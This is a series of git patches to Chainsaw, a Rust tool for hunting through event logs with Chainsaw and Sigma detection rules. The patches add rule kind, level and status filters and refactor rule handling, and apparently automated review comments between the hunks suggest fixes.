!kinds.contains(&Kind::Sigma) { + return Ok(vec![]); + } + } let sigma = match rules .into_iter() .map(|y| serde_yaml::from_value::(y)) @@ -110,9 +127,9 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { .status .map(|s| match s.as_str() { "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Testing, + _ => chainsaw::Status::Experimental, }) - .unwrap_or_else(|| chainsaw::Status::Testing), + .unwrap_or_else(|| chainsaw::Status::Experimental), timestamp: "".to_owned(), fields: vec![], @@ -130,6 +147,11 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { }) .collect() } else if let Ok(rule) = stalker::load(path) { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Stalker) { + return Ok(vec![]); + } + } vec![Rule { chainsaw: Chainsaw { name: rule.tag, 
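Review bot: In the Sigma status mapping every status other than `stable` becomes `Status::Experimental`, so rules that Sigma marks as `deprecated` or `unsupported` (as far as I recall both are part of Sigma's status vocabulary next to `test` and `experimental`) are indistinguishable from experimental ones and cannot be excluded with the new `--status` filter. Consider adding a `Deprecated` variant to `Status` (with matching `Display`/`FromStr` arms in `src/rule/chainsaw.rs`) and mapping `"deprecated" | "unsupported" => chainsaw::Status::Deprecated,` here, or at least document the collapse with `// NOTE: every non-stable Sigma status (test, experimental, deprecated, unsupported) maps to Experimental`. The same fall-through exists for the Stalker arm in the next hunk. The enclosing `load_rule` starts and ends outside this hunk.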
@@ -147,7 +169,7 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { }, status: match rule.status.as_str() { "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Testing, + _ => chainsaw::Status::Experimental, }, timestamp: "".to_owned(), @@ -165,9 +187,19 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { anyhow::bail!("failed to load rule, run the linter for more information"); }; - if rules.is_empty() { - anyhow::bail!("No valid rules could be loaded from the file"); + if let Some(levels) = levels.as_ref() { + rules = rules + .into_iter() + .filter(|r| levels.contains(&r.chainsaw.level)) + .collect(); } + if let Some(statuses) = statuses.as_ref() { + rules = rules + .into_iter() + .filter(|r| statuses.contains(&r.chainsaw.status)) + .collect(); + } + Ok(rules) } From d7f922d263ec29db8bbbab42f2c8dd907df67d05 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 26 Jun 2022 18:31:59 +0100 Subject: [PATCH 45/77] tweak: align some help naming --- src/main.rs | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/src/main.rs b/src/main.rs index 11fba64b..84e0decd 100644 --- a/src/main.rs +++ b/src/main.rs @@ -67,10 +67,10 @@ enum Command { json: bool, /// Restrict loaded rules to specified kinds. #[structopt(long = "kind", number_of_values = 1)] - kinds: Vec, + kind: Vec, /// Restrict loaded rules to specified levels. #[structopt(long = "level", number_of_values = 1)] - levels: Vec, + level: Vec, /// Allow chainsaw to try and load files it cannot identify. #[structopt(long = "load-unknown")] load_unknown: bool, @@ -91,7 +91,7 @@ enum Command { skip_errors: bool, /// Restrict loaded rules to specified statuses. #[structopt(long = "status", number_of_values = 1)] - statuses: Vec, + status: Vec, /// Output the timestamp using the timezone provided. #[structopt(long = "timezone", group = "tz")] timezone: Option, 
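Review bot: A file that parses but yields no rules now comes back as `Ok(vec![])` because the `if rules.is_empty() { anyhow::bail!(...) }` guard was removed, and the caller in `src/main.rs` only counts non-empty results, so such a file is neither counted nor reported as failed. Keep the guard ahead of the level/status filters so only filter-driven emptiness is silent: `if rules.is_empty() { anyhow::bail!("No valid rules could be loaded from the file"); }` placed before `if let Some(levels) = levels.as_ref()`. The two filter passes can also avoid reallocating with `rules.retain(|r| levels.contains(&r.chainsaw.level));` and `rules.retain(|r| statuses.contains(&r.chainsaw.status));`. `load_rule` starts outside the hunk.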
@@ -236,14 +236,14 @@ fn run() -> Result<()> { from, full, json, - kinds, - levels, + kind, + level, local, metadata, output, quiet, skip_errors, - statuses, + status, timezone, to, } => { @@ -272,20 +272,20 @@ fn run() -> Result<()> { .collect::>() .join(", ") ); - let kinds: Option> = if kinds.is_empty() { + let kinds: Option> = if kind.is_empty() { None } else { - Some(HashSet::from_iter(kinds.into_iter())) + Some(HashSet::from_iter(kind.into_iter())) }; - let levels: Option> = if levels.is_empty() { + let levels: Option> = if level.is_empty() { None } else { - Some(HashSet::from_iter(levels.into_iter())) + Some(HashSet::from_iter(level.into_iter())) }; - let statuses: Option> = if statuses.is_empty() { + let statuses: Option> = if status.is_empty() { None } else { - Some(HashSet::from_iter(statuses.into_iter())) + Some(HashSet::from_iter(status.into_iter())) }; let mut failed = 0; let mut count = 0; From e38a6a46e95a1807c883e62ff1ce0bf78751541c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 14:34:50 +0100 Subject: [PATCH 46/77] tweak: change how we handle rules internally --- src/cli.rs | 98 +++++++------ src/hunt.rs | 147 +++++++++---------- src/lib.rs | 3 +- src/main.rs | 38 +++-- src/rule/chainsaw.rs | 92 +----------- src/rule/mod.rs | 328 +++++++++++++++++++++++++------------------ src/rule/sigma.rs | 24 +++- src/rule/stalker.rs | 25 ---- 8 files changed, 369 insertions(+), 386 deletions(-) delete mode 100644 src/rule/stalker.rs diff --git a/src/cli.rs b/src/cli.rs index d58b4825..1974e42b 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,4 +1,4 @@ -use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; +use std::collections::{hash_map::DefaultHasher, BTreeMap, HashMap, HashSet}; use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; 
@@ -12,10 +12,7 @@ use uuid::Uuid; use crate::file::Kind as FileKind; use crate::hunt::{Detections, Hunt, Kind}; -use crate::rule::{ - chainsaw::{Level, Rule as Chainsaw, Status}, - Kind as RuleKind, -}; +use crate::rule::{Kind as RuleKind, Level, Rule, Status}; use crate::write::WRITER; #[cfg(not(windows))] @@ -106,13 +103,13 @@ pub struct Grouping<'a> { pub struct Hit<'a> { hunt: &'a Hunt, - rule: &'a Chainsaw, + rule: &'a Rule, } pub fn print_detections( detections: &[Detections], hunts: &[Hunt], - rules: &HashMap>, + rules: &BTreeMap, column_width: u32, full: bool, local: bool, @@ -160,7 +157,6 @@ pub fn print_detections( // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); - let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Unpack detections let mut groups: HashMap<&String, Vec> = HashMap::new(); @@ -173,7 +169,7 @@ pub fn print_detections( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, @@ -239,7 +235,7 @@ pub fn print_detections( }; let mut rows = vec![]; - let mut seen: HashMap> = HashMap::new(); + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); 
@@ -319,18 +315,30 @@ pub fn print_detections( cell!("status").style_spec("c"), ])); for rule in &rules { - table.add_row(Row::new(vec![ - cell!(split_tag(&rule.name)), - cell!(rule.authors.join("\n")), - cell!(rule.level), - cell!(rule.status), - ])); + match rule { + Rule::Chainsaw(c) => { + table.add_row(Row::new(vec![ + cell!(split_tag(&c.name)), + cell!(c.authors.join("\n")), + cell!(c.level), + cell!(c.status), + ])); + } + Rule::Sigma(s) => { + table.add_row(Row::new(vec![ + cell!(split_tag(&s.name)), + cell!(s.authors.join("\n")), + cell!(s.level), + cell!(s.status), + ])); + } + } } cells.push(cell!(table)); } else { cells.push(cell!(rules .iter() - .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name))) + .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name()))) .collect::>() .join("\n"))); } @@ -348,7 +356,7 @@ pub fn print_detections( pub fn print_csv( detections: &[Detections], hunts: &[Hunt], - rules: &HashMap>, + rules: &BTreeMap, local: bool, timezone: Option, ) -> crate::Result<()> { @@ -382,7 +390,6 @@ pub fn print_csv( // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); - let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Unpack detections let mut groups: HashMap<&String, Vec> = HashMap::new(); @@ -395,7 +402,7 @@ pub fn print_csv( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, @@ -459,7 +466,7 @@ pub fn print_csv( }; let mut rows = vec![]; - let mut seen: HashMap> = HashMap::new(); + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); 
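Review bot: The `Rule::Chainsaw` and `Rule::Sigma` arms in the rule table build identical rows and differ only in which struct they read, which is exactly what the `name()`, `level()` and `status()` accessors this patch adds to `Rule` in `src/rule/mod.rs` are for; an `authors()` accessor would let the match collapse to `table.add_row(Row::new(vec![cell!(split_tag(rule.name())), cell!(rule.authors().join("\n")), cell!(rule.level()), cell!(rule.status())]));`. The same duplicated match appears in `print_json` later in this file, so the accessor pays for itself twice. `print_detections` starts and ends outside the hunk.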
@@ -527,7 +534,7 @@ pub fn print_csv( cells.push( rules .iter() - .map(|rule| rule.name.to_string()) + .map(|rule| rule.name().to_string()) .collect::>() .join(";"), ); @@ -550,28 +557,25 @@ pub struct Detection<'a> { pub authors: &'a Vec, pub level: &'a Level, - pub source: &'a RuleKind, + pub source: RuleKind, pub status: &'a Status, } pub fn print_json( detections: &[Detections], - rules: &HashMap>, + hunts: &[Hunt], + rules: &BTreeMap, local: bool, timezone: Option, ) -> crate::Result<()> { - let mut rs: HashMap<_, _> = HashMap::new(); - for (kind, rules) in rules { - for (id, rule) in rules { - rs.insert(id, (kind, rule)); - } - } + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let mut detections = detections .iter() .flat_map(|d| { let mut detections = Vec::with_capacity(d.hits.len()); for hit in &d.hits { - let (kind, rule) = rs.get(&hit.rule).expect("could not get rule!"); + let hunt = hunts.get(&hit.hunt).expect("could not get rule!"); + let rule = rules.get(&hit.rule).expect("could not get rule!"); let localised = if let Some(timezone) = timezone { timezone .from_local_datetime(&hit.timestamp) @@ -586,16 +590,28 @@ pub fn print_json( } else { DateTime::::from_utc(hit.timestamp, Utc).to_rfc3339() }; - detections.push(Detection { - authors: &rule.authors, - group: &rule.group, - kind: &d.kind, - level: &rule.level, - name: &rule.name, - source: kind, - status: &rule.status, - timestamp: localised, - }) + match rule { + Rule::Chainsaw(c) => detections.push(Detection { + authors: &c.authors, + group: &hunt.group, + kind: &d.kind, + level: &c.level, + name: &c.name, + source: RuleKind::Chainsaw, + status: &c.status, + timestamp: localised, + }), + Rule::Sigma(s) => detections.push(Detection { + authors: &s.authors, + group: &hunt.group, + kind: &d.kind, + level: &s.level, + name: &s.name, + source: RuleKind::Sigma, + status: &s.status, + timestamp: localised, + }), + } } detections }) 
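Review bot: The new hunt lookup in `print_json` reuses the rule lookup's panic message, `hunts.get(&hit.hunt).expect("could not get rule!")`, so a missing hunt id would be reported as a missing rule; it should read `let hunt = hunts.get(&hit.hunt).expect("could not get hunt!");`. Both `expect`s mean an inconsistent `Detections`/`Hunt` pair aborts the whole output after hunting has completed; if that is acceptable, a one-line comment stating the invariant (`// hit ids are produced by Hunter from these same hunts/rules, so a miss is a bug`) would save the next reader from wondering. `print_json`'s body continues into the next hunk.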
diff --git a/src/hunt.rs b/src/hunt.rs index eb3ab59a..35ffbe12 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -1,4 +1,4 @@ -use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; +use std::collections::{hash_map::DefaultHasher, BTreeMap, HashMap, HashSet}; use std::fs; use std::hash::{Hash, Hasher}; use std::io::Read; @@ -18,8 +18,8 @@ use uuid::Uuid; use crate::file::{Document as File, Kind as FileKind, Reader}; use crate::rule::{ - chainsaw::{Aggregate, Container, Field, Filter, Format, Rule as Chainsaw}, - Kind as RuleKind, Rule, + chainsaw::{Container, Field, Format}, + Aggregate, Filter, Kind as RuleKind, Rule, }; #[derive(Clone, Deserialize)] 
@@ -89,33 +89,34 @@ impl HunterBuilder { let mut hunts = vec![]; let rules = match self.rules { Some(mut rules) => { - rules.sort_by(|x, y| x.chainsaw.name.cmp(&y.chainsaw.name)); - let mut map = HashMap::new(); + rules.sort_by(|x, y| x.name().cmp(&y.name())); + let mut map = BTreeMap::new(); for rule in rules { let uuid = Uuid::new_v4(); - let rules = map.entry(rule.kind.clone()).or_insert(vec![]); - if rule.kind == RuleKind::Chainsaw { - let mapper = Mapper::from(rule.chainsaw.fields.clone()); - hunts.push(Hunt { - id: uuid, - - group: rule.chainsaw.group.clone(), - kind: HuntKind::Rule { - aggregate: rule.chainsaw.aggregate.clone(), - filter: rule.chainsaw.filter.clone(), - }, - timestamp: rule.chainsaw.timestamp.clone(), - - file: rule.chainsaw.kind.clone(), - mapper, - rule: rule.kind, - }); + match &rule { + Rule::Chainsaw(rule) => { + let mapper = Mapper::from(rule.fields.clone()); + hunts.push(Hunt { + id: uuid, + + group: rule.group.clone(), + kind: HuntKind::Rule { + aggregate: rule.aggregate.clone(), + filter: rule.filter.clone(), + }, + timestamp: rule.timestamp.clone(), + + file: rule.kind.clone(), + mapper, + }); + } + _ => {} } - (*rules).push((uuid, rule.chainsaw)); + map.insert(uuid, rule); } map } - None => HashMap::new(), + None => BTreeMap::new(), }; if let Some(mut mappings) = self.mappings { mappings.sort(); @@ -130,6 +131,9 @@ impl HunterBuilder { Ok(a) => a, Err(e) => anyhow::bail!("Provided mapping file is invalid - {}", e), }; + if let RuleKind::Chainsaw = mapping.rules { + anyhow::bail!("Chainsaw rules do not support mappings"); + } mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); for group in mapping.groups { let mapper = Mapper::from(group.fields); @@ -140,12 +144,12 @@ impl HunterBuilder { kind: HuntKind::Group { exclusions: mapping.exclusions.clone(), filter: group.filter, + kind: mapping.rules.clone(), }, timestamp: group.timestamp, file: mapping.kind.clone(), mapper, - rule: mapping.rules.clone(), }); } } 
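Review bot: `rules.sort_by(name)` now only determines the order of the `hunts` vector, because the rules themselves go into a `BTreeMap` keyed by a fresh `Uuid::new_v4()` whose ordering is random, so anything iterating `rules()` (the per-document rule loop later in this file) sees a different rule order on every run. If stable ordering was the intent behind the sort, keep an ordered `Vec<Uuid>` next to the map or key it on `(name, uuid)`; if not, a comment such as `// NOTE: map order is by random uuid; only `hunts` keeps the name order` stops the next reader assuming the sort carries over. The `match &rule { Rule::Chainsaw(rule) => { ... } _ => {} }` reads more clearly as `if let Rule::Chainsaw(rule) = &rule {`. `HunterBuilder::build` starts and ends outside the hunk.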
@@ -215,6 +219,7 @@ pub enum HuntKind { Group { exclusions: HashSet, filter: Expression, + kind: RuleKind, }, Rule { aggregate: Option, @@ -342,7 +347,6 @@ pub struct Hunt { pub timestamp: String, pub file: FileKind, - pub rule: RuleKind, } impl Hunt { @@ -356,7 +360,7 @@ impl Hunt { pub struct HunterInner { hunts: Vec, - rules: HashMap>, + rules: BTreeMap, load_unknown: bool, local: bool, 
@@ -444,53 +448,50 @@ impl Hunter { } match &hunt.kind { - HuntKind::Group { exclusions, filter } => { - if let Some(rules) = self.inner.rules.get(&hunt.rule) { - if tau_engine::core::solve(filter, &mapped) { - for (rid, rule) in rules { - if exclusions.contains(&rule.name) { - continue; - } - let hit = match &rule.filter { - Filter::Detection(detection) => { - tau_engine::solve(detection, &mapped) - } - Filter::Expression(expression) => { - tau_engine::core::solve(expression, &mapped) - } - }; - if hit { - if let Some(aggregate) = &rule.aggregate { - files - .insert(document_id, (document.clone(), timestamp)); - let mut hasher = DefaultHasher::new(); - let mut skip = false; - for field in &aggregate.fields { - if let Some(value) = - mapped.find(field).and_then(|s| s.to_string()) - { - value.hash(&mut hasher); - } else { - skip = true; - break; - } - } - if skip { - continue; + HuntKind::Group { + exclusions, + filter, + kind, + } => { + if tau_engine::core::solve(filter, &mapped) { + for (rid, rule) in &self.inner.rules { + if !rule.is_kind(kind) { + continue; + } + if exclusions.contains(rule.name()) { + continue; + } + let hit = rule.solve(&mapped); + if hit { + if let Some(aggregate) = &rule.aggregate() { + files.insert(document_id, (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + let mut skip = false; + for field in &aggregate.fields { + if let Some(value) = + mapped.find(field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } else { + skip = true; + break; } - let id = hasher.finish(); - let aggregates = aggregates - .entry((hunt.id, *rid)) - .or_insert((aggregate, HashMap::new())); - let docs = aggregates.1.entry(id).or_insert(vec![]); - docs.push(document_id); - } else { - hits.push(Hit { - hunt: hunt.id, - rule: *rid, - timestamp, - }); } + if skip { + continue; + } + let id = hasher.finish(); + let aggregates = aggregates + .entry((hunt.id, *rid)) + .or_insert((aggregate, HashMap::new())); + let docs = 
aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id); + } else { + hits.push(Hit { + hunt: hunt.id, + rule: *rid, + timestamp, + }); } } } @@ -603,7 +604,7 @@ impl Hunter { &self.inner.hunts } - pub fn rules(&self) -> &HashMap> { + pub fn rules(&self) -> &BTreeMap { &self.inner.rules } diff --git a/src/lib.rs b/src/lib.rs index 1aef655d..d69a30d3 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -6,8 +6,7 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Hunter, HunterBuilder}; pub use rule::{ - chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind, Level as RuleLevel, - Status as RuleStatus, + lint, load, sigma, Filter, Kind as RuleKind, Level as RuleLevel, Status as RuleStatus, }; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index 84e0decd..d24b230f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -13,8 +13,8 @@ use chrono_tz::Tz; use structopt::StructOpt; use chainsaw::{ - cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, RuleLevel, - RuleStatus, Searcher, Writer, + cli, get_files, lint as lint_rule, load as load_rule, set_writer, Filter, Format, Hunter, + RuleKind, RuleLevel, RuleStatus, Searcher, Writer, }; #[derive(StructOpt)] @@ -86,6 +86,9 @@ enum Command { /// Supress informational output. #[structopt(short = "q")] quiet: bool, + /// Sigma rules to hunt with. + #[structopt(short = "s", long = "sigma", number_of_values = 1, requires("mapping"))] + sigma: Option>, /// Continue to hunt when an error is encountered. #[structopt(long = "skip-errors")] skip_errors: bool, @@ -242,6 +245,7 @@ fn run() -> Result<()> { metadata, output, quiet, + sigma, skip_errors, status, timezone, @@ -255,6 +259,7 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; + let sigma = sigma.unwrap_or_default(); cs_eprintln!( "[+] Loading event logs from: {}", 
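Review bot: Every document that passes the group filter now triggers a scan of all loaded rules, most of which are rejected by `is_kind(kind)`, whereas the old code fetched only the rules of `hunt.rule` via `rules.get`; with a Chainsaw rule set loaded next to Sigma this is a per-document linear walk over rules that can never hit, and the group filter is evaluated even when no rule of that kind was loaded. Partitioning the rule ids by kind once in `HunterBuilder::build` (e.g. a `rules_by_kind: HashMap<RuleKind, Vec<Uuid>>` on `HunterInner`) restores the old shape, as in the excerpt below. `&rule.aggregate()` also yields a `&&Option<Aggregate>` that only works through match ergonomics; `rule.aggregate().as_ref()` or an accessor returning `Option<&Aggregate>` is clearer. The enclosing method starts before and ends after this hunk.
```rust
HuntKind::Group { exclusions, filter, kind } => {
    if tau_engine::core::solve(filter, &mapped) {
        // Only the ids of this mapping's kind, partitioned once in HunterBuilder::build.
        let ids = self.inner.rules_by_kind.get(kind).map(Vec::as_slice).unwrap_or(&[]);
        for rid in ids {
            let rule = &self.inner.rules[rid];
            if exclusions.contains(rule.name()) {
                continue;
            }
            // … unchanged: rule.solve, aggregate hashing and hit collection …
```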
@@ -292,20 +297,29 @@ fn run() -> Result<()> { let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&file, &mapping.is_some(), &kinds, &levels, &statuses) { - Ok(mut r) => { + match load_rule(RuleKind::Chainsaw, &file, &kinds, &levels, &statuses) { + Ok(r) => { if !r.is_empty() { count += 1; - rs.append(&mut r) + rs.extend(r) } } - Err(e) => { - // Hacky way of exposing rule types from load_rule function - if e.to_string() == "sigma-no-mapping" { - return Err(anyhow::anyhow!( - "No mapping file specified for provided Sigma rules, specify one with the '-m' flag", - )); + Err(_) => { + failed += 1; + } + } + } + } + for path in &sigma { + for file in get_files(path, &None, skip_errors)? { + match load_rule(RuleKind::Sigma, &file, &kinds, &levels, &statuses) { + Ok(r) => { + if !r.is_empty() { + count += 1; + rs.extend(r) } + } + Err(_) => { failed += 1; } } @@ -370,7 +384,7 @@ fn run() -> Result<()> { if csv { cli::print_csv(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else if json { - cli::print_json(&detections, hunter.rules(), local, timezone)?; + cli::print_json(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index 7d52f70f..d1e93137 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs 
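Review bot: Both load loops now match `Err(_) => { failed += 1; }`, so the reason a rule file was rejected is discarded and the user only sees a failure count; the removed branch at least surfaced the missing-mapping case, which is now enforced by `requires("mapping")` on `--sigma`, but a malformed rule or a typo in a path still vanishes silently. Print the path and error through the same `cs_eprintln!` used for the loading banner, and fold the two copies of the loop into one iteration over `[(RuleKind::Chainsaw, &rules), (RuleKind::Sigma, &sigma)]` so the chainsaw and sigma paths cannot drift apart. `run()` starts and ends outside the hunk.
```rust
// … unchanged: failed / count / rs initialisation …
for (kind, paths) in [(RuleKind::Chainsaw, &rules), (RuleKind::Sigma, &sigma)] {
    for path in paths {
        for file in get_files(path, &None, skip_errors)? {
            match load_rule(kind.clone(), &file, &kinds, &levels, &statuses) {
                Ok(r) => {
                    if !r.is_empty() {
                        count += 1;
                        rs.extend(r)
                    }
                }
                Err(e) => {
                    // Keep the reason visible; a bare counter hides typos in rule paths.
                    cs_eprintln!("[!] Failed to load rule {}: {}", file.display(), e);
                    failed += 1;
                }
            }
        }
    }
}
```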
@@ -2,26 +2,15 @@ use std::fmt; use std::fs::File; use std::io::Read; use std::path::Path; -use std::str::FromStr; use serde::{ de::{self, MapAccess, Visitor}, - Deserialize, Serialize, -}; -use tau_engine::core::{ - optimiser, - parser::{Expression, Pattern}, - Detection, + Deserialize, }; +use tau_engine::core::optimiser; use crate::file::Kind; - -#[derive(Clone, Debug, Deserialize)] -pub struct Aggregate { - #[serde(deserialize_with = "crate::ext::tau::deserialize_numeric")] - pub count: Pattern, - pub fields: Vec, -} +use crate::rule::{Aggregate, Filter, Level, Status}; #[derive(Clone, Debug, Deserialize)] pub struct Container { 
@@ -120,87 +109,12 @@ impl<'de> Deserialize<'de> for Field { } } -#[derive(Clone, Debug, Deserialize)] -#[serde(untagged)] -pub enum Filter { - Detection(Detection), - #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] - Expression(Expression), -} - #[derive(Clone, Debug, Deserialize)] #[serde(rename_all = "snake_case")] pub enum Format { Json, } -#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] -#[serde(rename_all = "snake_case")] -pub enum Level { - Critical, - High, - Medium, - Low, - Info, -} - -impl fmt::Display for Level { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - match self { - Self::Critical => write!(f, "critical"), - Self::High => write!(f, "high"), - Self::Medium => write!(f, "medium"), - Self::Low => write!(f, "low"), - Self::Info => write!(f, "info"), - } - } -} - -impl FromStr for Level { - type Err = anyhow::Error; - - fn from_str(s: &str) -> Result { - let v = match s { - "critical" => Self::Critical, - "high" => Self::High, - "medium" => Self::Medium, - "low" => Self::Low, - "info" => Self::Info, - _ => anyhow::bail!("unknown level, must be: critical, high, medium, low or info"), - }; - Ok(v) - } -} - -#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] -#[serde(rename_all = "snake_case")] -pub enum Status { - Stable, - Experimental, -} - -impl fmt::Display for Status { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - match self { - Self::Stable => write!(f, "stable"), - Self::Experimental => write!(f, "experimental"), - } - } -} - -impl FromStr for Status { - type Err = anyhow::Error; - - fn from_str(s: &str) -> Result { - let v = match s { - "stable" => Self::Stable, - "experimental" => Self::Experimental, - _ => anyhow::bail!("unknown status, must be: stable or experimental"), - }; - Ok(v) - } -} - #[derive(Clone, Debug, Deserialize)] pub struct Rule { #[serde(alias = "title")] diff --git a/src/rule/mod.rs b/src/rule/mod.rs index e7d44ba5..4f972978 100644 
--- a/src/rule/mod.rs +++ b/src/rule/mod.rs 
@@ -4,23 +4,100 @@ use std::path::Path; use std::str::FromStr; use serde::{Deserialize, Serialize}; +use tau_engine::{ + core::{ + optimiser, + parser::{Expression, Pattern}, + Detection, + }, + Document, +}; -use crate::file::Kind as FileKind; - -pub use self::chainsaw::{Filter, Level, Rule as Chainsaw, Status}; +pub use self::chainsaw::Rule as Chainsaw; pub use self::sigma::Rule as Sigma; -pub use self::stalker::Rule as Stalker; pub mod chainsaw; pub mod sigma; -pub mod stalker; + +#[derive(Clone, Debug)] +pub enum Rule { + Chainsaw(Chainsaw), + Sigma(Sigma), +} + +impl Rule { + #[inline] + pub fn aggregate(&self) -> &Option { + match self { + Self::Chainsaw(c) => &c.aggregate, + Self::Sigma(s) => &s.aggregate, + } + } + + #[inline] + pub fn is_kind(&self, kind: &Kind) -> bool { + match self { + Self::Chainsaw(_) => kind == &Kind::Chainsaw, + Self::Sigma(_) => kind == &Kind::Sigma, + } + } + + #[inline] + pub fn level(&self) -> &Level { + match self { + Self::Chainsaw(c) => &c.level, + Self::Sigma(s) => &s.level, + } + } + + #[inline] + pub fn name(&self) -> &String { + match self { + Self::Chainsaw(c) => &c.name, + Self::Sigma(s) => &s.name, + } + } + + #[inline] + pub fn solve(&self, document: &dyn Document) -> bool { + match self { + Self::Chainsaw(c) => match &c.filter { + Filter::Detection(detection) => tau_engine::solve(detection, document), + Filter::Expression(expression) => tau_engine::core::solve(expression, document), + }, + Self::Sigma(s) => tau_engine::solve(&s.tau.detection, document), + } + } + + #[inline] + pub fn status(&self) -> &Status { + match self { + Self::Chainsaw(c) => &c.status, + Self::Sigma(s) => &s.status, + } + } +} + +#[derive(Clone, Debug, Deserialize)] +pub struct Aggregate { + #[serde(deserialize_with = "crate::ext::tau::deserialize_numeric")] + pub count: Pattern, + pub fields: Vec, +} + +#[derive(Clone, Debug, Deserialize)] +#[serde(untagged)] +pub enum Filter { + Detection(Detection), + #[serde(deserialize_with = 
"crate::ext::tau::deserialize_expression")] + Expression(Expression), +} #[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Kind { Chainsaw, Sigma, - Stalker, } impl Default for Kind { @@ -34,7 +111,6 @@ impl fmt::Display for Kind { match self { Self::Chainsaw => write!(f, "chainsaw"), Self::Sigma => write!(f, "sigma"), - Self::Stalker => write!(f, "stalker"), } } } 
@@ -46,22 +122,81 @@ impl FromStr for Kind { let v = match s { "chainsaw" => Self::Chainsaw, "sigma" => Self::Sigma, - "stalker" => Self::Stalker, - _ => anyhow::bail!("unknown kind, must be: chainsaw, sigma or stalker"), + _ => anyhow::bail!("unknown kind, must be: chainsaw, or sigma"), + }; + Ok(v) + } +} + +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Level { + Critical, + High, + Medium, + Low, + Info, +} + +impl fmt::Display for Level { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Critical => write!(f, "critical"), + Self::High => write!(f, "high"), + Self::Medium => write!(f, "medium"), + Self::Low => write!(f, "low"), + Self::Info => write!(f, "info"), + } + } +} + +impl FromStr for Level { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "critical" => Self::Critical, + "high" => Self::High, + "medium" => Self::Medium, + "low" => Self::Low, + "info" => Self::Info, + _ => anyhow::bail!("unknown level, must be: critical, high, medium, low or info"), }; Ok(v) } } -#[derive(Debug)] -pub struct Rule { - pub chainsaw: Chainsaw, - pub kind: Kind, +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Status { + Stable, + Experimental, +} + +impl fmt::Display for Status { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Stable => write!(f, "stable"), + Self::Experimental => write!(f, "experimental"), + } + } } -pub fn load_rule( +impl FromStr for Status { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "stable" => Self::Stable, + "experimental" => Self::Experimental, + _ => anyhow::bail!("unknown status, must be: stable or experimental"), + }; + Ok(v) + } +} +pub fn load( + kind: Kind, path: &Path, - mapping: &bool, kinds: &Option>, levels: &Option>, statuses: &Option>, 
